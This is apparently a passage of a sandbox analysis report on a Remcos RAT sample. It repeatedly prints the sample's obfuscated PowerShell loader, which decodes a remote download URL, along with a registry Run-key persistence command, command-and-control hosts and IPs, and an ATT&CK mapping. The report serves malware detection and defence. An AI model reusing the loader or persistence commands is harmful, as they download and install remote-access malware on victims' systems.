oDyn ecEgadsO U emlKelso=St,rt$ raflaDeflofSom tfUnth I PhilrPrepgmBes.na.ilbut Sttyi Spr,oFusionB vareRethrRLabdan autoe';$outyelps+=Krigskunst 'Sn.er5Klods.Ps mm0Hypok Presi(FohatWAkkusiSeksunAeo idRefleoSheatwProcesSidst stikdNHandgTAntim mbel1Koll 0Hjtta. Opna0Bar u;Tr,ch A ndWNotouiCistsnRhomb6 Afsv4Damp,; elep snd gxCompe6 ircu4nedsl; Refo temnrMerrivT bul:spalt1 Bese3 Fors4Anti .Jo,fr0.ioly)Navle MariGLantheGapescPopulk GranoSla t/tekst2Whitt0K udd1Excur0,nfar0 imsf1Sklde0Convo1Rollm S rvFBibeliTh.rar Ci teRetiaf Halco Z ppxth,ee/Infla1 ryns3Acros4Trium.Forsg0';$dermutation=Krigskunst ' DecaUjordsSA pliEExstirRhino-.arboaTaeniGBeh,nEEskatnBygget';$Tredjeinstansbevillings=Krigskunst 'Fi kehH rcutSkudetSpitep Etro:Untea/endod/s alosOvermbPolyat hysieGenbrcS,amkhAssocu ilbsS uff.Unlugc .ortoMeu rm Geni/Flu tz.erviiantapgAnticiTyran/Sulf,H Anthe .ypenBonifgEv ngiestisvTishre BundlImmunsNappee Trafn S iss Krnk. RetfcGenlyhhumanm';$Textus=Krigskunst 'Am hi>';$Postlachrymal=Krigskunst 'B.deriF erdE HydrX';$Occipitallyncorruptibly='Unlax';$Emmensite='\Leveringstiden.Req';Strejflyset (Krigskunst 'Janic$ AndeGTerpilSkyldO Mal.bli.abaUnwinl weig:ForvuVKokosAWilliNLeje D PartO Udbym asypRWed eAMar aaDiiodd,ookeeGrund= Bead$Pa kwe DrivnCoracvTrick:BobleaT wlipSubtrplen pdHydr ABu.bitPinnuaB.dmt+Ene g$FolkeEkakerMNonosMOstraEM orhN AverSSystei accuTAfkryE');Strejflyset (Krigskunst 'Xyli,$ DiphGgif.eLBortfo.ottiBenglaAOvnenlWhi k: ,mrevLn,inaIldhun LoneD MariDBal,sYphilobCrackDRenteEMommanDecodSvarme=Lumin$QuizzttilslrNi htEKes.rd r faj HaanE M soIhektonReshosDisowTEccenaT,lemNZymicSFleecBArt se ,pprV For IUntelLDominL Chaei Forkn ,oncGNeds sTroa .For asP,ytiPAmidoLunderISuccetPepsi(Atomp$ overT micreHovmexOnychtGalgeUStol,sUnste)');Strejflyset (Krigskunst $Overkrslerne);$Tredjeinstansbevillings=$Vanddybdens[0];$Gavmildes=(Krigskunst 'Mater$KerfsgAdenolL.geroSupe,b pmosA ArgolStrad:ZapotbSuspelForkog BespeStdtrDCaly ASlyn Lfo,eneG,ydenForha9dvelr0Afteg=AttennbortgeImpl w Lapp-FuldhOMagisB arkiJb,ddeeUnexcCForlftHaspe pynteSTa peY ongS BommtBetale I,dhMDegra. Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "Motorskib" /t REG_EXPAND_SZ /d "%Markoerpositioner% -windowstyle 1 $Skan=(gi 'HKCU:\Software\Fjeldrreder\').GetValue('dvaergene');%Markoerpositioner% ($Skan)"Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "Motorskib" /t REG_EXPAND_SZ /d "%Markoerpositioner% -windowstyle 1 $Skan=(gi 'HKCU:\Software\Fjeldrreder\').GetValue('dvaergene');%Markoerpositioner% ($Skan)"Jump to behavior
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "echo $hles;function strejflyset($chefkokkes){ .($postlachrymal) ($chefkokkes)} function krigskunst($diplomatariers){$occipitally=5;do{$undefinably+=$diplomatariers[$occipitally];format-list;$occipitally+=6} until(!$diplomatariers[$occipitally])$undefinably}$lovgennemgangene=krigskunst 'udskrnhorrieglyphtbagdi. atow';$lovgennemgangene+=krigskunst 'lame eczbiab srloclarvelarthrinuthaecha tn grant';$outyelps=krigskunst ' r stmevoluored lzaf.riipelskl,kupulhungaakobra/';$affirmationerne=krigskunst 'lrerftdedoll intess tte1valut2';$overkrslerne='inden[hesitn,aintejohnstunwea.overgsfoursekval,racetyvracefihandlcayensemoun psarono ssei lomn blomtcatacmnonofasimrenbygniacoqueg kva,ekrat rkarse]dermi:p.rvi:delinsveinae uthycomphaulabo rchokti reentgasbey evepstatirinf rodetaltcane odyn ecegadso u emlkelso=st,rt$ rafladeflofsom tfunth i philrprepgmbes.na.ilbut sttyi spr,ofusionb varerethrrlabdan autoe';$outyelps+=krigskunst 'sn.er5klods.ps mm0hypok presi(fohatwakkusiseksunaeo idrefleosheatwprocessidst stikdnhandgtantim mbel1koll 0hjtta. opna0bar u;tr,ch a ndwnotouicistsnrhomb6 afsv4damp,; elep snd gxcompe6 ircu4nedsl; refo temnrmerrivt bul:spalt1 bese3 fors4anti .jo,fr0.ioly)navle mariglanthegapescpopulk granosla t/tekst2whitt0k udd1excur0,nfar0 imsf1sklde0convo1rollm s rvfbibelith.rar ci teretiaf halco z ppxth,ee/infla1 ryns3acros4trium.forsg0';$dermutation=krigskunst ' decaujordssa plieexstirrhino-.arboataenigbeh,neeskatnbygget';$tredjeinstansbevillings=krigskunst 'fi kehh rcutskudetspitep etro:untea/endod/s alosovermbpolyat hysiegenbrcs,amkhassocu ilbss uff.unlugc .ortomeu rm geni/flu tz.erviiantapganticityran/sulf,h anthe .ypenbonifgev ngiestisvtishre bundlimmunsnappee trafn s iss krnk. retfcgenlyhhumanm';$textus=krigskunst 'am hi>';$postlachrymal=krigskunst 'b.derif erde hydrx';$occipitallyncorruptibly='unlax';$emmensite='\leveringstiden.req';strejflyset (krigskunst 'janic$ andegterpilskyldo mal.bli.abaunwinl weig:forvuvkokosawillinleje d parto udbym asyprwed eamar aadiiodd,ookeegrund= bead$pa kwe drivncoracvtrick:bobleat wlipsubtrplen pdhydr abu.bitpinnuab.dmt+ene g$folkeekakermnonosmostraem orhn averssystei accutafkrye');strejflyset (krigskunst 'xyli,$ diphggif.elbortfo.ottibenglaaovnenlwhi k: ,mrevln,inaildhun loned maridbal,syphilobcrackdrenteemommandecodsvarme=lumin$quizzttilslrni htekes.rd r faj haane m soihektonreshosdisowteccenat,lemnzymicsfleecbart se ,pprv for iuntelldominl chaei forkn ,oncgneds stroa .for asp,ytipamidolunderisuccetpepsi(atomp$ overt micrehovmexonychtgalgeustol,sunste)');strejflyset (krigskunst $overkrslerne);$tredjeinstansbevillings=$vanddybdens[0];$gavmildes=(krigskunst 'mater$kerfsgadenoll.gerosupe,b pmosa argolstrad:zapotbsuspelforkog bespestdtrdcaly aslyn lfo,eneg,ydenforha9dvelr0afteg=attennbortgeimpl w lapp-fuldhomagisb arkijb,ddeeunexccforlfthaspe pyntesta pey ongs bommtbetale i,dhmdegra.
            Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "echo $hles;function strejflyset($chefkokkes){ .($postlachrymal) ($chefkokkes)} function krigskunst($diplomatariers){$occipitally=5;do{$undefinably+=$diplomatariers[$occipitally];format-list;$occipitally+=6} until(!$diplomatariers[$occipitally])$undefinably}$lovgennemgangene=krigskunst 'udskrnhorrieglyphtbagdi. atow';$lovgennemgangene+=krigskunst 'lame eczbiab srloclarvelarthrinuthaecha tn grant';$outyelps=krigskunst ' r stmevoluored lzaf.riipelskl,kupulhungaakobra/';$affirmationerne=krigskunst 'lrerftdedoll intess tte1valut2';$overkrslerne='inden[hesitn,aintejohnstunwea.overgsfoursekval,racetyvracefihandlcayensemoun psarono ssei lomn blomtcatacmnonofasimrenbygniacoqueg kva,ekrat rkarse]dermi:p.rvi:delinsveinae uthycomphaulabo rchokti reentgasbey evepstatirinf rodetaltcane odyn ecegadso u emlkelso=st,rt$ rafladeflofsom tfunth i philrprepgmbes.na.ilbut sttyi spr,ofusionb varerethrrlabdan autoe';$outyelps+=krigskunst 'sn.er5klods.ps mm0hypok presi(fohatwakkusiseksunaeo idrefleosheatwprocessidst stikdnhandgtantim mbel1koll 0hjtta. opna0bar u;tr,ch a ndwnotouicistsnrhomb6 afsv4damp,; elep snd gxcompe6 ircu4nedsl; refo temnrmerrivt bul:spalt1 bese3 fors4anti .jo,fr0.ioly)navle mariglanthegapescpopulk granosla t/tekst2whitt0k udd1excur0,nfar0 imsf1sklde0convo1rollm s rvfbibelith.rar ci teretiaf halco z ppxth,ee/infla1 ryns3acros4trium.forsg0';$dermutation=krigskunst ' decaujordssa plieexstirrhino-.arboataenigbeh,neeskatnbygget';$tredjeinstansbevillings=krigskunst 'fi kehh rcutskudetspitep etro:untea/endod/s alosovermbpolyat hysiegenbrcs,amkhassocu ilbss uff.unlugc .ortomeu rm geni/flu tz.erviiantapganticityran/sulf,h anthe .ypenbonifgev ngiestisvtishre bundlimmunsnappee trafn s iss krnk. retfcgenlyhhumanm';$textus=krigskunst 'am hi>';$postlachrymal=krigskunst 'b.derif erde hydrx';$occipitallyncorruptibly='unlax';$emmensite='\leveringstiden.req';strejflyset (krigskunst 'janic$ andegterpilskyldo mal.bli.abaunwinl weig:forvuvkokosawillinleje d parto udbym asyprwed eamar aadiiodd,ookeegrund= bead$pa kwe drivncoracvtrick:bobleat wlipsubtrplen pdhydr abu.bitpinnuab.dmt+ene g$folkeekakermnonosmostraem orhn averssystei accutafkrye');strejflyset (krigskunst 'xyli,$ diphggif.elbortfo.ottibenglaaovnenlwhi k: ,mrevln,inaildhun loned maridbal,syphilobcrackdrenteemommandecodsvarme=lumin$quizzttilslrni htekes.rd r faj haane m soihektonreshosdisowteccenat,lemnzymicsfleecbart se ,pprv for iuntelldominl chaei forkn ,oncgneds stroa .for asp,ytipamidolunderisuccetpepsi(atomp$ overt micrehovmexonychtgalgeustol,sunste)');strejflyset (krigskunst $overkrslerne);$tredjeinstansbevillings=$vanddybdens[0];$gavmildes=(krigskunst 'mater$kerfsgadenoll.gerosupe,b pmosa argolstrad:zapotbsuspelforkog bespestdtrdcaly aslyn lfo,eneg,ydenforha9dvelr0afteg=attennbortgeimpl w lapp-fuldhomagisb arkijb,ddeeunexccforlfthaspe pyntesta pey ongs bommtbetale i,dhmdegra.
            Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" /c reg add "hkcu\software\microsoft\windows\currentversion\run" /f /v "motorskib" /t reg_expand_sz /d "%markoerpositioner% -windowstyle 1 $skan=(gi 'hkcu:\software\fjeldrreder\').getvalue('dvaergene');%markoerpositioner% ($skan)"
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "echo $hles;function strejflyset($chefkokkes){ .($postlachrymal) ($chefkokkes)} function krigskunst($diplomatariers){$occipitally=5;do{$undefinably+=$diplomatariers[$occipitally];format-list;$occipitally+=6} until(!$diplomatariers[$occipitally])$undefinably}$lovgennemgangene=krigskunst 'udskrnhorrieglyphtbagdi. atow';$lovgennemgangene+=krigskunst 'lame eczbiab srloclarvelarthrinuthaecha tn grant';$outyelps=krigskunst ' r stmevoluored lzaf.riipelskl,kupulhungaakobra/';$affirmationerne=krigskunst 'lrerftdedoll intess tte1valut2';$overkrslerne='inden[hesitn,aintejohnstunwea.overgsfoursekval,racetyvracefihandlcayensemoun psarono ssei lomn blomtcatacmnonofasimrenbygniacoqueg kva,ekrat rkarse]dermi:p.rvi:delinsveinae uthycomphaulabo rchokti reentgasbey evepstatirinf rodetaltcane odyn ecegadso u emlkelso=st,rt$ rafladeflofsom tfunth i philrprepgmbes.na.ilbut sttyi spr,ofusionb varerethrrlabdan autoe';$outyelps+=krigskunst 'sn.er5klods.ps mm0hypok presi(fohatwakkusiseksunaeo idrefleosheatwprocessidst stikdnhandgtantim mbel1koll 0hjtta. opna0bar u;tr,ch a ndwnotouicistsnrhomb6 afsv4damp,; elep snd gxcompe6 ircu4nedsl; refo temnrmerrivt bul:spalt1 bese3 fors4anti .jo,fr0.ioly)navle mariglanthegapescpopulk granosla t/tekst2whitt0k udd1excur0,nfar0 imsf1sklde0convo1rollm s rvfbibelith.rar ci teretiaf halco z ppxth,ee/infla1 ryns3acros4trium.forsg0';$dermutation=krigskunst ' decaujordssa plieexstirrhino-.arboataenigbeh,neeskatnbygget';$tredjeinstansbevillings=krigskunst 'fi kehh rcutskudetspitep etro:untea/endod/s alosovermbpolyat hysiegenbrcs,amkhassocu ilbss uff.unlugc .ortomeu rm geni/flu tz.erviiantapganticityran/sulf,h anthe .ypenbonifgev ngiestisvtishre bundlimmunsnappee trafn s iss krnk. retfcgenlyhhumanm';$textus=krigskunst 'am hi>';$postlachrymal=krigskunst 'b.derif erde hydrx';$occipitallyncorruptibly='unlax';$emmensite='\leveringstiden.req';strejflyset (krigskunst 'janic$ andegterpilskyldo mal.bli.abaunwinl weig:forvuvkokosawillinleje d parto udbym asyprwed eamar aadiiodd,ookeegrund= bead$pa kwe drivncoracvtrick:bobleat wlipsubtrplen pdhydr abu.bitpinnuab.dmt+ene g$folkeekakermnonosmostraem orhn averssystei accutafkrye');strejflyset (krigskunst 'xyli,$ diphggif.elbortfo.ottibenglaaovnenlwhi k: ,mrevln,inaildhun loned maridbal,syphilobcrackdrenteemommandecodsvarme=lumin$quizzttilslrni htekes.rd r faj haane m soihektonreshosdisowteccenat,lemnzymicsfleecbart se ,pprv for iuntelldominl chaei forkn ,oncgneds stroa .for asp,ytipamidolunderisuccetpepsi(atomp$ overt micrehovmexonychtgalgeustol,sunste)');strejflyset (krigskunst $overkrslerne);$tredjeinstansbevillings=$vanddybdens[0];$gavmildes=(krigskunst 'mater$kerfsgadenoll.gerosupe,b pmosa argolstrad:zapotbsuspelforkog bespestdtrdcaly aslyn lfo,eneg,ydenforha9dvelr0afteg=attennbortgeimpl w lapp-fuldhomagisb arkijb,ddeeunexccforlfthaspe pyntesta pey ongs bommtbetale i,dhmdegra. Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" /c reg add "hkcu\software\microsoft\windows\currentversion\run" /f /v "motorskib" /t reg_expand_sz /d "%markoerpositioner% -windowstyle 1 $skan=(gi 'hkcu:\software\fjeldrreder\').getvalue('dvaergene');%markoerpositioner% ($skan)"Jump to behavior
            Source: msiexec.exe, 00000006.00000003.128560027986.00000000088AA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
            Source: msiexec.exe, 00000006.00000002.128753909051.000000000884C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [2025/02/27 01:44:39 Program Manager]
            Source: msiexec.exe, 00000006.00000003.128560027986.00000000088AA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [%04i/%02i/%02i %02i:%02i:%02i Program Manager]
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information

            barindex
            Yara detected Remcos RAT
            Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 1616, type: MEMORYSTR
            Source: Yara matchFile source: C:\Users\user\AppData\Roaming\abios.dat, type: DROPPED

            Remote Access Functionality

            barindex
            Yara detected Remcos RAT
            Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 1616, type: MEMORYSTR
            Source: Yara matchFile source: C:\Users\user\AppData\Roaming\abios.dat, type: DROPPED

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity Information221
            Scripting            		Valid Accounts11
            Windows Management Instrumentation            		221
            Scripting            		1
            DLL Side-Loading            		2
            Obfuscated Files or Information            		11
            Input Capture            		1
            File and Directory Discovery            		Remote Services1
            Archive Collected Data            		1
            Ingress Tool Transfer            		Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault Accounts1
            Exploitation for Client Execution            		1
            DLL Side-Loading            		312
            Process Injection            		1
            Software Packing            		LSASS Memory14
            System Information Discovery            		Remote Desktop Protocol11
            Input Capture            		11
            Encrypted Channel            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain Accounts2
            Command and Scripting Interpreter            		1
            Registry Run Keys / Startup Folder            		1
            Registry Run Keys / Startup Folder            		1
            DLL Side-Loading            		Security Account Manager311
            Security Software Discovery            		SMB/Windows Admin SharesData from Network Shared Drive1
            Non-Standard Port            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal Accounts2
            PowerShell            		Login HookLogin Hook1
            Masquerading            		NTDS13
            Virtualization/Sandbox Evasion            		Distributed Component Object ModelInput Capture2
            Non-Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            Modify Registry            		LSA Secrets2
            Process Discovery            		SSHKeylogging13
            Application Layer Protocol            		Scheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts13
            Virtualization/Sandbox Evasion            		Cached Domain Credentials1
            Application Window Discovery            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items312
            Process Injection            		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1625389 Sample: REMIT_SCAN_0000891773837828... Startdate: 27/02/2025 Architecture: WINDOWS Score: 100 33 sbtechus.com 2->33 35 ipfs.io 2->35 49 Suricata IDS alerts for network traffic 2->49 51 Malicious sample detected (through community Yara rule) 2->51 53 Antivirus detection for URL or domain 2->53 55 6 other signatures 2->55 9 powershell.exe 18 2->9         started        12 wscript.exe 1 2->12         started        signatures3 process4 signatures5 57 Early bird code injection technique detected 9->57 59 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 9->59 61 Writes to foreign memory regions 9->61 69 3 other signatures 9->69 14 msiexec.exe 6 8 9->14         started        19 conhost.exe 9->19         started        63 VBScript performs obfuscated calls to suspicious functions 12->63 65 Suspicious powershell command line found 12->65 67 Wscript starts Powershell (via cmd or directly) 12->67 71 3 other signatures 12->71 21 powershell.exe 14 18 12->21         started        process6 dnsIp7 37 62.171.160.89, 2404, 49784, 49785 CONTABODE United Kingdom 14->37 39 ipfs.io 209.94.90.1, 443, 49783 PROTOCOLUS United States 14->39 31 C:\Users\user\AppData\Roaming\abios.dat, data 14->31 dropped 43 Tries to detect Any.run 14->43 45 Installs a global keyboard hook 14->45 23 cmd.exe 1 14->23         started        41 sbtechus.com 216.252.233.15, 49782, 80 SATLYNX_AGCZ Switzerland 21->41 47 Found suspicious powershell code related to unpacking or dynamic code loading 21->47 25 conhost.exe 21->25         started        file8 signatures9 process10 process11 27 conhost.exe 23->27         started        29 reg.exe 1 1 23->29         started       

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.